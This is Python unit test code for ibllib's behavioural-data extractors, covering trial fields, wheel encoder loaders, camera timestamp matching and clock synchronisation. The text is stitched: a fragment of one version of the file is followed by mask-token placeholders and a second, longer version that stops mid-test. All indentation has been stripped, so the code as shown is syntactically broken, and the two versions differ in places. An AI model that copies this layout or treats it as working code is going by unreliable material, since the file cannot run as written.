for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
        self.assertEqual(audio, audio_, "Audio dict shouldn't be affected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| <mask token>
import functools
import shutil
import tempfile
import unittest
import unittest.mock
from pathlib import Path
import numpy as np
import pandas as pd
import one.alf.io as alfio
from ibllib.io.extractors import training_trials, biased_trials, camera
from ibllib.io import raw_data_loaders as raw
from ibllib.io.extractors.base import BaseExtractor
def wheelMoves_fixture(func):
"""Decorator to save some dummy wheelMoves ALF files for extraction tests"""
@functools.wraps(func)
def wrapper(obj=None):
# Save some wheelMoves ALF files
attr_list = ['training_lt5',
'training_ge5',
'biased_lt5',
'biased_ge5']
alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list]
n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]
for p, n in zip(alf_paths, n_trials):
p.mkdir()
np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))
np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))
# Run method
func(obj)
# Teardown; delete the files
for p in alf_paths:
shutil.rmtree(p)
return wrapper
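# NB: wheelMoves_fixture is applied below to tests that need wheelMoves ALF files
# on disk (see TestExtractTrialData.test_extract_all)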
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path']))
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path']))
        # turn off logging for unit testing as we will purposely go into warning/error cases
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
        # dummy wheelMoves data for trial firstMovement_times extraction is saved
        # by the wheelMoves_fixture decorator above
def test_get_feedbackType(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackType(
self.training_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# -- version >= 5.0.0
ft = training_trials.FeedbackType(
self.training_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# BIASED SESSIONS
ft = biased_trials.FeedbackType(
self.biased_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_lt5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
# -- version >= 5.0.0
ft = biased_trials.FeedbackType(
self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
# check if no 0's in feedbackTypes
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
# TRAINING SESSIONS
cl, cr = training_trials.ContrastLR(
self.training_lt5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# -- version >= 5.0.0
cl, cr = training_trials.ContrastLR(
self.training_ge5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# BIASED SESSIONS
cl, cr = biased_trials.ContrastLR(
self.biased_lt5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
# -- version >= 5.0.0
cl, cr = biased_trials.ContrastLR(
self.biased_ge5['path']).extract()[0]
self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))
self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
def test_get_probabilityLeft(self):
# TRAINING SESSIONS
pl = training_trials.ProbabilityLeft(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# -- version >= 5.0.0
pl = training_trials.ProbabilityLeft(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
# BIASED SESSIONS
pl = biased_trials.ProbabilityLeft(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
        # Test that only probabilities from the probability set appear
md = raw.load_settings(self.biased_lt5['path'])
if md:
probs = md['BLOCK_PROBABILITY_SET']
probs.append(0.5)
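            # 0.5 is valid too: presumably the unbiased block at the start of the session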
self.assertTrue(sum([x in probs for x in pl]) == len(pl))
# -- version >= 5.0.0
pl = biased_trials.ProbabilityLeft(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(pl, np.ndarray))
        # Test that only probabilities from the probability set appear
md = raw.load_settings(self.biased_ge5['path'])
probs = md['BLOCK_PROBABILITY_SET']
probs.append(0.5)
self.assertTrue(sum([x in probs for x in pl]) == len(pl))
def test_get_choice(self):
# TRAINING SESSIONS
choice = training_trials.Choice(
session_path=self.training_lt5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# -- version >= 5.0.0
choice = training_trials.Choice(
session_path=self.training_ge5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# BIASED SESSIONS
choice = biased_trials.Choice(
session_path=self.biased_lt5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
# -- version >= 5.0.0
choice = biased_trials.Choice(
session_path=self.biased_ge5['path']).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array(
[~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])
for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
# TODO: Test its sawtooth
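        # (repNum should count up within a block of repeated trials and reset
        # afterwards, hence the expected sawtooth shape)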
# TRAINING SESSIONS
rn = training_trials.RepNum(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
# -- version >= 5.0.0
rn = training_trials.RepNum(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
        # BIASED SESSIONS have no repeated trials
def test_get_rewardVolume(self):
# TRAINING SESSIONS
rv = training_trials.RewardVolume(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# -- version >= 5.0.0
rv = training_trials.RewardVolume(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
# BIASED SESSIONS
rv = biased_trials.RewardVolume(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
        # Test that all non-zero rewards have the same value
self.assertTrue(all([x == max(rv) for x in rv if x != 0]))
# -- version >= 5.0.0
rv = biased_trials.RewardVolume(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
        # Test that all non-zero rewards have the same value
self.assertTrue(all([x == max(rv) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
# BIASED SESSIONS
ft = biased_trials.FeedbackTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
# BIASED SESSIONS
ft = biased_trials.FeedbackTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
# TRAINING SESSIONS
sott = training_trials.StimOnTriggerTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# -- version >= 5.0.0
sott = training_trials.StimOnTriggerTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# BIASED SESSIONS
sott = biased_trials.StimOnTriggerTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# -- version >= 5.0.0
sott = biased_trials.StimOnTriggerTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
def test_get_stimOn_times_lt5(self):
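        # StimOnTimes is deprecated; these checks only ensure the legacy extractor still runs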
# TRAINING SESSIONS
st = training_trials.StimOnTimes_deprecated(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnTimes_deprecated(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_get_stimOn_times_ge5(self):
# TRAINING SESSIONS
st = training_trials.StimOnTimes_deprecated(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnTimes_deprecated(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_stimOnOffFreeze_times(self):
# TRAINING SESSIONS
st = training_trials.StimOnOffFreezeTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnOffFreezeTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# TRAINING SESSIONS
st = training_trials.StimOnOffFreezeTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnOffFreezeTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
def test_get_intervals(self):
# TRAINING SESSIONS
di = training_trials.Intervals(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# -- version >= 5.0.0
di = training_trials.Intervals(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# BIASED SESSIONS
di = biased_trials.Intervals(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# -- version >= 5.0.0
di = biased_trials.Intervals(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
# TRAINING SESSIONS
rt = training_trials.ResponseTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# -- version >= 5.0.0
rt = training_trials.ResponseTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# BIASED SESSIONS
rt = biased_trials.ResponseTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# -- version >= 5.0.0
rt = biased_trials.ResponseTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
def test_get_goCueTrigger_times(self):
# TRAINING SESSIONS
data = raw.load_data(self.training_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps']
['closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
# -- version >= 5.0.0
gct = training_trials.GoCueTriggerTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
# BIASED SESSIONS
data = raw.load_data(self.biased_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps']
['closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
# -- version >= 5.0.0
gct = biased_trials.GoCueTriggerTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
def test_get_goCueOnset_times(self):
# TRAINING SESSIONS
gcot = training_trials.GoCueTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
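        # the lt5 test session yields no valid go cue onsets, hence the all-NaN array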
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
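        # NB: `size != 0 or size == 4` can only fail for an empty array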
# -- version >= 5.0.0
gcot = training_trials.GoCueTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
# BIASED SESSIONS
gcot = biased_trials.GoCueTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
# -- version >= 5.0.0
gcot = biased_trials.GoCueTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
# -- version >= 5.0.0
it = training_trials.IncludedTrials(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
# -- version >= 5.0.0
it = biased_trials.IncludedTrials(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
# TRAINING SESSIONS
        # Expect an error to be raised because no wheel moves were present in the test data
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(
self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception))
# -- version >= 5.0.0
out, files = training_trials.extract_all(self.training_ge5['path'], save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
# BIASED SESSIONS
# The new trials extractor additionally extracts the wheel data and this fails for the < 5.0
# test data so we will stub the wheel extractor
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = ({}, [])
out, files = biased_trials.extract_all(
self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
# -- version >= 5.0.0
out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
# TRAINING SESSIONS
# only for training?
path = self.training_lt5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144])
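        # the loader is expected to unwrap the 2 ** 32 clock reset, so the timestamps
        # both increase monotonically and match the raw values plus one rollover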
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
        # here we test for 2 kinds of file corruption that happen
        # 1/2 the first sample time is corrupt, absurdly high, and should be discarded
        # 2/2 two samples are swapped and need to be swapped back
path = self.biased_lt5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
# -- version >= 5.0.0
path = self.biased_ge5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
# the wheel folder contains other errors in bpod output that had to be addressed
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
def test_load_encoder_events(self):
raw.load_encoder_events(self.training_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.training_ge5['path'])
raw.load_encoder_events(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.biased_ge5['path'])
def test_size_outputs(self):
# check the output dimensions
# VERSION >= 5.0.0
from ibllib.io.extractors.bpod_trials import extract_all
extract_all(self.training_ge5['path'])
trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
extract_all(self.biased_ge5['path'])
trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
# VERSION < 5.0.0
# for these test data there are no wheel moves so let's mock the output
mock_data = {
'intervals': np.array([[0, 1], ]),
'peakAmplitude': np.array([1, 1]),
'peakVelocity_times': np.array([1, 1])}
function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves'
# Training
with unittest.mock.patch(function_name, return_value=mock_data):
extract_all(self.training_lt5['path'])
trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
# Biased
with unittest.mock.patch(function_name, return_value=mock_data):
extract_all(self.biased_lt5['path'])
trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
def tearDown(self):
for f in self.main_path.rglob('_ibl_log.*.log'):
f.unlink()
[x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()]
[x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()]
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
        drift_pol = np.array([11 * 1e-6, -20])  # bpod starts 20 secs before with 11 ppm drift
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + .001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) -> None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtractor(BaseExtractor):
save_names = (
"some_file.csv",
"some_file.tsv",
"some_file.ssv",
"some_file.npy",
)
var_names = (
"csv",
"ssv",
"tsv",
"npy",
)
def _extract(self, **kwargs) -> tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return (csv, ssv, tsv, npy)
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) -> None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
# self.addClassCleanup(tempdir.cleanup) # py3.8
        self.mock_extractor = MockExtractor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
